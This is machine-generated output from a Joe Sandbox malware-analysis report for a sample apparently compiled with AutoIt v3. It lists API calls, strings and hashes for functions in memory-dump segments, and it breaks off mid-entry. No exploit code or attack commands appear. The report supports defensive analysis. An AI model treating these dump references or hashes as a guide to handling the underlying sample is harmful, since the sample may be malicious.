                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                  • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                  • API String ID: 2910397461-517079104
                                                                  • Opcode ID: fa3257d8c5c6b808eb55e3c57ef933ecf1a70cd8f9e8c6d0d8e3198706bb3fb6
                                                                  • Instruction ID: cdac649467a9cbe25a1c45ee2b74eebe466888c6c91bfd890ce6c22165052ad4
                                                                  • Opcode Fuzzy Hash: fa3257d8c5c6b808eb55e3c57ef933ecf1a70cd8f9e8c6d0d8e3198706bb3fb6
                                                                  • Instruction Fuzzy Hash: CBA170B1A10219BFEB14DBA4DD4AFAF7BA9EB04710F144115FA15A72E0CBB0AD01DF64
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00F3B361
                                                                  • GetDriveTypeW.KERNEL32(?,00F62C4C,?,\\.\,00F60980), ref: 00F3B43E
                                                                  • SetErrorMode.KERNEL32(00000000,00F62C4C,?,\\.\,00F60980), ref: 00F3B59C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorMode$DriveType
                                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                  • API String ID: 2907320926-4222207086
                                                                  • Opcode ID: 6db32210f20bccdaf7334eb3991dbd1f3d783405ca3812fae379aa25a59a72e4
                                                                  • Instruction ID: 1dc8f4ac54cc848610308799c18cd116831f780185a8f074b1a8bb033ca02aab
                                                                  • Opcode Fuzzy Hash: 6db32210f20bccdaf7334eb3991dbd1f3d783405ca3812fae379aa25a59a72e4
                                                                  • Instruction Fuzzy Hash: 8951B432B4020DEBCB40EB20C963ABD77E1AF44760F284056E606B7291E775EE41FB56
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00F5A0F7
                                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00F5A1B0
                                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00F5A1CC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Window
                                                                  • String ID: 0
                                                                  • API String ID: 2326795674-4108050209
                                                                  • Opcode ID: 1aa430ff79a3f27c12d3b00f50801e8362f8ff057c13e4dff2c21b63e29ba081
                                                                  • Instruction ID: c37059a30d9c17410a75a85e273091ce46098925f9eb3e8b0a207ef26940406c
                                                                  • Opcode Fuzzy Hash: 1aa430ff79a3f27c12d3b00f50801e8362f8ff057c13e4dff2c21b63e29ba081
                                                                  • Instruction Fuzzy Hash: 58020030508301AFDB15CF14C848FAABBE4FF84326F18861DFA95972A1D775D868EB52
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetSysColor.USER32(00000012), ref: 00F5AF51
                                                                  • SetTextColor.GDI32(?,?), ref: 00F5AF55
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00F5AF6B
                                                                  • GetSysColor.USER32(0000000F), ref: 00F5AF76
                                                                  • CreateSolidBrush.GDI32(?), ref: 00F5AF7B
                                                                  • GetSysColor.USER32(00000011), ref: 00F5AF93
                                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00F5AFA1
                                                                  • SelectObject.GDI32(?,00000000), ref: 00F5AFB2
                                                                  • SetBkColor.GDI32(?,00000000), ref: 00F5AFBB
                                                                  • SelectObject.GDI32(?,?), ref: 00F5AFC8
                                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00F5AFE7
                                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00F5AFFE
                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00F5B013
                                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00F5B05F
                                                                  • GetWindowTextW.USER32 ref: 00F5B086
                                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00F5B0A4
                                                                  • DrawFocusRect.USER32 ref: 00F5B0AF
                                                                  • GetSysColor.USER32(00000011), ref: 00F5B0BD
                                                                  • SetTextColor.GDI32(?,00000000), ref: 00F5B0C5
                                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00F5B0D9
                                                                  • SelectObject.GDI32(?,00F5AC1F), ref: 00F5B0F0
                                                                  • DeleteObject.GDI32(?), ref: 00F5B0FB
                                                                  • SelectObject.GDI32(?,?), ref: 00F5B101
                                                                  • DeleteObject.GDI32(?), ref: 00F5B106
                                                                  • SetTextColor.GDI32(?,?), ref: 00F5B10C
                                                                  • SetBkColor.GDI32(?,?), ref: 00F5B116
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                  • String ID:
                                                                  • API String ID: 1996641542-0
                                                                  • Opcode ID: 6dcaf9cb80dd477287ba0179f329a3ef898183e5b175c1423740e1a9aae7bfca
                                                                  • Instruction ID: b9eec1f0fdba008bdaebb61562e04b3fd21a82ce4d141aedfa5e9931637aedcf
                                                                  • Opcode Fuzzy Hash: 6dcaf9cb80dd477287ba0179f329a3ef898183e5b175c1423740e1a9aae7bfca
                                                                  • Instruction Fuzzy Hash: 19615271900218BFDF119FA4DC48AAF7B79EF08321F244515FA25AB2A1DBB19D40EF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00F590EA
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F590FB
                                                                  • CharNextW.USER32(0000014E), ref: 00F5912A
                                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00F5916B
                                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00F59181
                                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00F59192
                                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00F591AF
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00F591FB
                                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00F59211
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00F59242
                                                                  • _memset.LIBCMT ref: 00F59267
                                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00F592B0
                                                                  • _memset.LIBCMT ref: 00F5930F
                                                                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00F59339
                                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00F59391
                                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00F5943E
                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00F59460
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00F594AA
                                                                  • SetMenuItemInfoW.USER32 ref: 00F594D7
                                                                  • DrawMenuBar.USER32(?), ref: 00F594E6
                                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00F5950E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                  • String ID: 0
                                                                  • API String ID: 1073566785-4108050209
                                                                  • Opcode ID: ac8cb4ac8dc96c7e2476e58903c5c8512fad395df891de33aa41d96ed72fd280
                                                                  • Instruction ID: 7970e6b2ce2c968838d237752092c26bd3d7a32f2879b066c3751183626218dd
                                                                  • Opcode Fuzzy Hash: ac8cb4ac8dc96c7e2476e58903c5c8512fad395df891de33aa41d96ed72fd280
                                                                  • Instruction Fuzzy Hash: 77E1B371904208EFDF259F60CC84EEE7BB8EF05721F144156FE15AA291DBB08A85EF61
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetCursorPos.USER32(?), ref: 00F55007
                                                                  • GetDesktopWindow.USER32 ref: 00F5501C
                                                                  • GetWindowRect.USER32 ref: 00F55023
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00F55085
                                                                  • DestroyWindow.USER32(?), ref: 00F550B1
                                                                  • CreateWindowExW.USER32 ref: 00F550DA
                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00F550F8
                                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00F5511E
                                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00F55133
                                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00F55146
                                                                  • IsWindowVisible.USER32(?), ref: 00F55166
                                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00F55181
                                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00F55195
                                                                  • GetWindowRect.USER32 ref: 00F551AD
                                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00F551D3
                                                                  • GetMonitorInfoW.USER32 ref: 00F551ED
                                                                  • CopyRect.USER32 ref: 00F55204
                                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00F5526F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                  • String ID: ($0$tooltips_class32
                                                                  • API String ID: 698492251-4156429822
                                                                  • Opcode ID: dfc0a747ece05016e8388426aa40e5d01097ce6ddcdd7004a64788e9bcd53aa0
                                                                  • Instruction ID: 8ca1b41a91f4d405f59240d58dbff4756ac7978d1678e6541f1c5f8d34b81743
                                                                  • Opcode Fuzzy Hash: dfc0a747ece05016e8388426aa40e5d01097ce6ddcdd7004a64788e9bcd53aa0
                                                                  • Instruction Fuzzy Hash: 5CB18B71604701AFDB04DF64C954B6BBBE4FF88710F00891DFA99AB291DB71E809DB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00F3499C
                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00F349C2
                                                                  • _wcscpy.LIBCMT ref: 00F349F0
                                                                  • _wcscmp.LIBCMT ref: 00F349FB
                                                                  • _wcscat.LIBCMT ref: 00F34A11
                                                                  • _wcsstr.LIBCMT ref: 00F34A1C
                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00F34A38
                                                                  • _wcscat.LIBCMT ref: 00F34A81
                                                                  • _wcscat.LIBCMT ref: 00F34A88
                                                                  • _wcsncpy.LIBCMT ref: 00F34AB3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                  • API String ID: 699586101-1459072770
                                                                  • Opcode ID: e47c7adfb1138fc8880ccbbccb53ae9d9b58c1e5dc9e314fe8405ee16201f1e1
                                                                  • Instruction ID: 5bf5b6f2d38b15856856db33e63de9462fedbdbf16110de31e2f3072b3ec4bf3
                                                                  • Opcode Fuzzy Hash: e47c7adfb1138fc8880ccbbccb53ae9d9b58c1e5dc9e314fe8405ee16201f1e1
                                                                  • Instruction Fuzzy Hash: 7841E772A00209BADB15BB748C47EBF77ECDF45720F101059FA04B6192EB75EA01A7A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SystemParametersInfoW.USER32 ref: 00ED2C8C
                                                                  • GetSystemMetrics.USER32 ref: 00ED2C94
                                                                  • SystemParametersInfoW.USER32 ref: 00ED2CBF
                                                                  • GetSystemMetrics.USER32 ref: 00ED2CC7
                                                                  • GetSystemMetrics.USER32 ref: 00ED2CEC
                                                                  • SetRect.USER32 ref: 00ED2D09
                                                                  • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00ED2D19
                                                                  • CreateWindowExW.USER32 ref: 00ED2D4C
                                                                  • SetWindowLongW.USER32 ref: 00ED2D60
                                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00ED2D7E
                                                                  • GetStockObject.GDI32(00000011), ref: 00ED2D9A
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED2DA5
                                                                    • Part of subcall function 00ED2714: GetCursorPos.USER32(?,?,00F977B0,?,00F977B0,00F977B0,?,00F5C5FF,00000000,00000001,?,?,?,00F0BD40,?,?), ref: 00ED2727
                                                                    • Part of subcall function 00ED2714: ScreenToClient.USER32 ref: 00ED2744
                                                                    • Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000001), ref: 00ED2769
                                                                    • Part of subcall function 00ED2714: GetAsyncKeyState.USER32(00000002), ref: 00ED2777
                                                                  • SetTimer.USER32(00000000,00000000,00000028,00ED13C7), ref: 00ED2DCC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                  • String ID: AutoIt v3 GUI
                                                                  • API String ID: 1458621304-248962490
                                                                  • Opcode ID: 44fd33168fefbe11e0f98a0ed388151fbd8e1b12aa5d64107df11bd06dd3717d
                                                                  • Instruction ID: d985e93373a0e3914e063e7d75e4cb9b6b46d1d71fb774b78a0f2f6e6a2cc26c
                                                                  • Opcode Fuzzy Hash: 44fd33168fefbe11e0f98a0ed388151fbd8e1b12aa5d64107df11bd06dd3717d
                                                                  • Instruction Fuzzy Hash: CBB17075A1030A9FDB14DFA8CD45BAE7BB4FB18314F20422AFA15A72D0DB70A851EF51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00EE1821: _memmove.LIBCMT ref: 00EE185B
                                                                  • GetForegroundWindow.USER32(00F60980,?,?,?,?,?), ref: 00EF04E3
                                                                  • IsWindow.USER32(?), ref: 00F266BB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Foreground_memmove
                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                  • API String ID: 3828923867-1919597938
                                                                  • Opcode ID: 6b8727626ee11f4cdc3e765caa5dfe96c636178f63f9f40d063e19caee86103e
                                                                  • Instruction ID: cfbb6e89c52ddb1f21223b9752e17c27f8c016dce1d54915f631f71e6d85f971
                                                                  • Opcode Fuzzy Hash: 6b8727626ee11f4cdc3e765caa5dfe96c636178f63f9f40d063e19caee86103e
                                                                  • Instruction Fuzzy Hash: 09D11630504256DBDB14EF20D8419AABBF0FF54314F204A1DF555A72A3DF30E999EB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CharUpperBuffW.USER32(?,?), ref: 00F544AC
                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F5456C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharMessageSendUpper
                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                  • API String ID: 3974292440-719923060
                                                                  • Opcode ID: 1a9c00ed747ed6a418fe94ae7efcec36e3dbeee2054c39cf5c6c8c01ff6cf2e5
                                                                  • Instruction ID: 6c6bd6ceb81800db3727af3572ec27c6a2d9774d784f45bca8f57e3b5c2c7489
                                                                  • Opcode Fuzzy Hash: 1a9c00ed747ed6a418fe94ae7efcec36e3dbeee2054c39cf5c6c8c01ff6cf2e5
                                                                  • Instruction Fuzzy Hash: 23A1AE312042019FCB14EF20D851A6AB3E5EF89315F104969FD56AB7D2DB31FC4ADB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00F456E1
                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00F456EC
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00F456F7
                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00F45702
                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00F4570D
                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00F45718
                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00F45723
                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00F4572E
                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00F45739
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00F45744
                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00F4574F
                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00F4575A
                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00F45765
                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00F45770
                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00F4577B
                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00F45786
                                                                  • GetCursorInfo.USER32(?), ref: 00F45796
                                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 00F457C1
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                  • String ID:
                                                                  • API String ID: 3215588206-0
                                                                  • Opcode ID: 21f586db2015a8b4065e6efb43e1ed3a8d67c7c3fe09367bcfb04b76e7a93300
                                                                  • Instruction ID: ceb9e45d2107c3128881097b6795b0ca87daa5c91887ca482ae3d2eca93b9698
                                                                  • Opcode Fuzzy Hash: 21f586db2015a8b4065e6efb43e1ed3a8d67c7c3fe09367bcfb04b76e7a93300
                                                                  • Instruction Fuzzy Hash: A3415370E04319ABDB109FBA8C49D6FFEF8EF51B20B10452FE519E7291DAB8A401CE51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                  • String ID: %s%u
                                                                  • API String ID: 3744389584-679674701
                                                                  • Opcode ID: 9f41e9098213251d9564d1ccf27bd0064e402c5592c3dd8689a3b283c5a7f177
                                                                  • Instruction ID: 24cdc4de7913941e5f149ded83edcf2f9ef332a3b0ac13e47049e95ea452a512
                                                                  • Opcode Fuzzy Hash: 9f41e9098213251d9564d1ccf27bd0064e402c5592c3dd8689a3b283c5a7f177
                                                                  • Instruction Fuzzy Hash: DEA11171600326EFD718EF60D894BAAB7E8FF44360F104629FDA9D2091DB30E955DB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
